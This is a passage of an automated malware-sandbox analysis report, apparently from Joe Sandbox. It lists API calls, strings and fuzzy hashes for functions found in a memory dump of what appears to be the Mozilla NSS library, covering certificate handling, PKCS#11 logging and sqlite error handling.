APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C7EAFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C909500,6C7E3F91), ref: 6C7EAFD2

Part of subcall function 6C83B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9118D0,?), ref: 6C83B095

DER_GetInteger_Util.NSS3(?), ref: 6C7EB007

Part of subcall function 6C836A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C7E1666,?,6C7EB00C,?), ref: 6C836AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C7EB02F
PR_CallOnce.NSS3(6C942AA4,6C8412D0), ref: 6C7EB046
PL_FreeArenaPool.NSS3 ref: 6C7EB058
PL_FinishArenaPool.NSS3 ref: 6C7EB060

Strings

security, xrefs: 6C7EAFB8

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: 036248518993aa576217ba71edca6957b5eb824ed9737d888b6100a6832fcc42
Instruction ID: 2259ae68d20120bc4267694c9bbbf9fca16aa1f220bffdf3b89c146ab3cfef8b
Opcode Fuzzy Hash: 036248518993aa576217ba71edca6957b5eb824ed9737d888b6100a6832fcc42
Instruction Fuzzy Hash: F0312E7140430497DB208F18DE457AA7BA4AF8A32CF104B29E9749BBD1E332F109C79B

Uniqueness

Uniqueness Score: -1.00%

Function 6C82CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C82CD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C82CE16
PR_SetError.NSS3(00000000,00000000), ref: 6C82D079

Part of subcall function 6C88C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C88C2BF

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 23f9756d07d950ae72ca308c29b195ddfbc3c9a936ee716b8d39e64793592fc9
Instruction ID: f20f1024a200aeae3b08a984822254c4130616129c000e4267685b871ef9c393
Opcode Fuzzy Hash: 23f9756d07d950ae72ca308c29b195ddfbc3c9a936ee716b8d39e64793592fc9
Instruction Fuzzy Hash: E2C1AFB5A002199BDB20CF28CD84BDAB7B4AF48318F1445A9D948A7741E779EED5CFC0

Uniqueness

Uniqueness Score: -1.00%

Function 6C8006A0 Relevance: 13.7, APIs: 9, Instructions: 225stringCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C8006C2
EnterCriticalSection.KERNEL32(?), ref: 6C8006D6
PR_Unlock.NSS3 ref: 6C8006EB

Part of subcall function 6C88DD70: TlsGetValue.KERNEL32 ref: 6C88DD8C
Part of subcall function 6C88DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C88DDB4

free.MOZGLUE(?), ref: 6C8007DE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8007FA

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalSectionValue$EnterLeaveUnlockfreestrlen
String ID:
API String ID: 3527478211-0
Opcode ID: e412c25ecc1d2b963d13314f37d94e4d50d8b8628299b95aa530319e3d460ecd
Instruction ID: 223392b11c378c0762b806f21e588d3d0898be3e903f451a190e498fb574f9b4
Opcode Fuzzy Hash: e412c25ecc1d2b963d13314f37d94e4d50d8b8628299b95aa530319e3d460ecd
Instruction Fuzzy Hash: A28109B1A007049FEB109F64CE85BAA7BB4BF09308F054568ED685B722EB31E955CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6C854620 Relevance: 13.7, APIs: 9, Instructions: 221threadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE02F,00000000,?,?,?,00000000), ref: 6C854963

Part of subcall function 6C7F3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C80AE42), ref: 6C7F30AA
Part of subcall function 6C7F3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7F30C7
Part of subcall function 6C7F3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7F30E5
Part of subcall function 6C7F3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7F3116
Part of subcall function 6C7F3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C7F312B
Part of subcall function 6C7F3090: PK11_DestroyObject.NSS3(?,?), ref: 6C7F3154
Part of subcall function 6C7F3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7F317E

SECOID_FindOID_Util.NSS3(?), ref: 6C85465E

Part of subcall function 6C8407B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C7E8298,?,?,?,6C7DFCE5,?), ref: 6C8407BF
Part of subcall function 6C8407B0: PL_HashTableLookup.NSS3(?,?), ref: 6C8407E6
Part of subcall function 6C8407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C84081B
Part of subcall function 6C8407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C840825

SECOID_FindOIDByTag_Util.NSS3(000000BF,00000000), ref: 6C854709
SECOID_GetAlgorithmTag_Util.NSS3(?,00000000), ref: 6C854727
SECOID_GetAlgorithmTag_Util.NSS3(?,?,00000000), ref: 6C85473B
PORT_NewArena_Util.NSS3(00000400,?,?,?,?,?,?,?,00000000), ref: 6C854801
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C912DA0,?,?,?,?,?,?,?,?,00000000), ref: 6C85482E
PR_GetCurrentThread.NSS3 ref: 6C8548F3
PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C854923
PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C854937
SECKEY_DestroyPublicKey.NSS3(?,?,?,00000000), ref: 6C85494E
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C854984
VFY_VerifyDataWithAlgorithmID.NSS3(?,?,?,6C8521C2,?,?,?), ref: 6C85499C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C8549B5
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,00000000), ref: 6C8549C5
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C8549DC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C8549E9

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Arena_Error$AlgorithmFreeTag_$Destroy$FindHashItem_LookupPublicTable$Alloc_ArenaConstCopyCurrentDataEncodeK11_ObjectThreadVerifyWithmemset
String ID:
API String ID: 1962444627-0
Opcode ID: 318cf2cd237192eebdd732c3ee98934c2ebd7513262351732ba00cd6df000b92
Instruction ID: 9c72b6d4beec423fcd5d8e2deca1d2962db16673d819a1ad9ca032fd4e687e87
Opcode Fuzzy Hash: 318cf2cd237192eebdd732c3ee98934c2ebd7513262351732ba00cd6df000b92
Instruction Fuzzy Hash: F17129B4E012085BFF608A69CA81BAA3765EFC631CF504839DD1597B91D771EC34CE91

Uniqueness

Uniqueness Score: -1.00%

Function 6C7E2C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(052D3AB7), ref: 6C7E2C5D

Part of subcall function 6C840D30: calloc.MOZGLUE ref: 6C840D50
Part of subcall function 6C840D30: TlsGetValue.KERNEL32 ref: 6C840D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C7E2C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7E2CE0

Part of subcall function 6C7E2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C7E2CDA,?,00000000), ref: 6C7E2E1E
Part of subcall function 6C7E2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C7E2E33
Part of subcall function 6C7E2E00: TlsGetValue.KERNEL32 ref: 6C7E2E4E
Part of subcall function 6C7E2E00: EnterCriticalSection.KERNEL32(?), ref: 6C7E2E5E
Part of subcall function 6C7E2E00: PL_HashTableLookup.NSS3(?), ref: 6C7E2E71
Part of subcall function 6C7E2E00: PL_HashTableRemove.NSS3(?), ref: 6C7E2E84
Part of subcall function 6C7E2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C7E2E96
Part of subcall function 6C7E2E00: PR_Unlock.NSS3 ref: 6C7E2EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7E2D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C7E2D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C7E2D3F
free.MOZGLUE(00000000), ref: 6C7E2D73
CERT_DestroyCertificate.NSS3(?), ref: 6C7E2DB8
free.MOZGLUE ref: 6C7E2DC8

Part of subcall function 6C7E3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7E3EC2
Part of subcall function 6C7E3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C7E3ED6
Part of subcall function 6C7E3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C7E3EEE
Part of subcall function 6C7E3E60: PR_CallOnce.NSS3(6C942AA4,6C8412D0), ref: 6C7E3F02
Part of subcall function 6C7E3E60: PL_FreeArenaPool.NSS3 ref: 6C7E3F14
Part of subcall function 6C7E3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7E3F27

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: 96340a2bdccb3f35972ab9d010e622b59fe24e2b7b926b5eb1332fb263f80feb
Instruction ID: 5fce868aec1e93f9f6069e2133c829a96ce6460e9fa621ce6eb8369bd97bba32
Opcode Fuzzy Hash: 96340a2bdccb3f35972ab9d010e622b59fe24e2b7b926b5eb1332fb263f80feb
Instruction Fuzzy Hash: 6051E173A042169BEB10DE69CE8AB6B77E5EF88308F140538E959C3650E731E8148B92

Uniqueness

Uniqueness Score: -1.00%

Function 6C844DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C84536F,00000022,?,?,00000000,?), ref: 6C844E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C844F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C844F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C844FAE
free.MOZGLUE(?), ref: 6C844FC8

Strings

%s=%s, xrefs: 6C844F89
%s=%c%s%c, xrefs: 6C844FA9

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s
API String ID: 2709355791-2032576422
Opcode ID: 47879f4b195aa5c45a54f9f2f511dbddc7706b55ec0177dd49764d8f6f2387b6
Instruction ID: a181727d9df8ccc86d467ea01cdc3107fad6cccf5b9e5ce420d4251adf1cf6ca
Opcode Fuzzy Hash: 47879f4b195aa5c45a54f9f2f511dbddc7706b55ec0177dd49764d8f6f2387b6
Instruction Fuzzy Hash: 4E516C31E0425D8BEB21CE69C690BFFBBF59FC2318F28C925E894A7B41D33599058791

Uniqueness

Uniqueness Score: -1.00%

Function 6C81ACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C81ACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C81AD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C81AD23

Part of subcall function 6C8FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C8FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C81AD39

Strings

(CK_INVALID_HANDLE), xrefs: 6C81AD1C
C_MessageDecryptFinal, xrefs: 6C81ACE1
hSession = 0x%x, xrefs: 6C81ACFE, 6C81AD0E

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
API String ID: 332880674-3521875567
Opcode ID: 84b87a2964ad1640d2e57d724380836f992376bda595cccc99c4abe479cd4503
Instruction ID: c772d85832f365da14a7f0b75708ddc8304dd216eff9a9ac7b9b49bc5653903b
Opcode Fuzzy Hash: 84b87a2964ad1640d2e57d724380836f992376bda595cccc99c4abe479cd4503
Instruction Fuzzy Hash: BF212830709504DFDB20AB68DE88BAA33F4BB4270EF148835E40997E01DB30980DC692

Uniqueness

Uniqueness Score: -1.00%

Function 6C7F8CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C80124D,00000001), ref: 6C7F8D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C80124D,00000001), ref: 6C7F8D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C80124D,00000001), ref: 6C7F8D73
PR_Unlock.NSS3(?,?,?,?,?,6C80124D,00000001), ref: 6C7F8D8C

Part of subcall function 6C88DD70: TlsGetValue.KERNEL32 ref: 6C88DD8C
Part of subcall function 6C88DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C88DDB4

PR_Unlock.NSS3(?,?,?,?,?,6C80124D,00000001), ref: 6C7F8DBA

Strings

KRAM, xrefs: 6C7F8CF9
KRAM, xrefs: 6C7F8D3E

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 845bbdec8efffcec5c91bb9cd2a1dfc46c25033134055c45e7a8c8ece2ab942a
Instruction ID: 1b98c736e2acfa2b659eadbb30fdf03138c8b1ff826db1d251607e4c021fe005
Opcode Fuzzy Hash: 845bbdec8efffcec5c91bb9cd2a1dfc46c25033134055c45e7a8c8ece2ab942a
Instruction Fuzzy Hash: D22181B5A046018FCB00EF39C68555EB7F0FF5A318F15897AD9A88B701E734D842CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C81A550 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageEncryptFinal), ref: 6C81A576
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C81A5A4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C81A5B3

Part of subcall function 6C8FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C8FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C81A5C9

Strings

(CK_INVALID_HANDLE), xrefs: 6C81A5AC
C_MessageEncryptFinal, xrefs: 6C81A571
hSession = 0x%x, xrefs: 6C81A58E, 6C81A59E

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageEncryptFinal
API String ID: 332880674-1768899908
Opcode ID: 9e4331e5aecaf77840c7f44d9150ec206edd3324950b39215b130561fd44f8ef
Instruction ID: 70f7ba596ffb0632bdc591a25f26df4bd83335bf76b05a975a70f61c810d5478
Opcode Fuzzy Hash: 9e4331e5aecaf77840c7f44d9150ec206edd3324950b39215b130561fd44f8ef
Instruction Fuzzy Hash: 2F21C171709205DFD720AFA8DE88BEA33F5AB4631DF148835E80997E01DB34D94DCA92

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F0ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C8F0EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C8F0EFA

Part of subcall function 6C7DAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C7DAF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C8F0F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C8F0F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C8F0F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C8F0F2B

Strings

Aborting, xrefs: 6C8F0EB3
Assertion failure: %s, at %s:%d, xrefs: 6C8F0ED9, 6C8F0EE5, 6C8F0F06, 6C8F0F0B

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 0a13dab3bac94ef615b40fccb294d0cdb74d9bbb0ad1badcf4c1c38c6189f74a
Instruction ID: dfc7b2cf8bda27949d88061afe27825433e8a29813d737c17c30f5d900fff5c4
Opcode Fuzzy Hash: 0a13dab3bac94ef615b40fccb294d0cdb74d9bbb0ad1badcf4c1c38c6189f74a
Instruction Fuzzy Hash: 3F01C0B6A00224ABDF12AF64DC49C9B3F3DEF462B8F104428FD1987702D735E91086A2

Uniqueness

Uniqueness Score: -1.00%

Function 6C8B4D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C8B4DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8B4DE0

Strings

API call with %s database connection pointer, xrefs: 6C8B4DBD
%s at line %d of [%.10s], xrefs: 6C8B4DDA
misuse, xrefs: 6C8B4DD5
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C8B4DCB
invalid, xrefs: 6C8B4DB8

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: c735d3b3f8e83fbd9673ca49c5f74c89059d5ddee9847c94addd1d62c0242cea
Instruction ID: 505fbc645fd9aa41d78cd98c383df5d6d284aa0320003738209bca2300490663
Opcode Fuzzy Hash: c735d3b3f8e83fbd9673ca49c5f74c89059d5ddee9847c94addd1d62c0242cea
Instruction Fuzzy Hash: 0CF0E911F1856C6FEB208115DE27F8637968FC231AF4E0DE0EE087BF92D269D85482D1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8B4DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C8B4E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8B4E4D

Strings

API call with %s database connection pointer, xrefs: 6C8B4E2A
%s at line %d of [%.10s], xrefs: 6C8B4E47
misuse, xrefs: 6C8B4E42
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C8B4E38
invalid, xrefs: 6C8B4E25

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
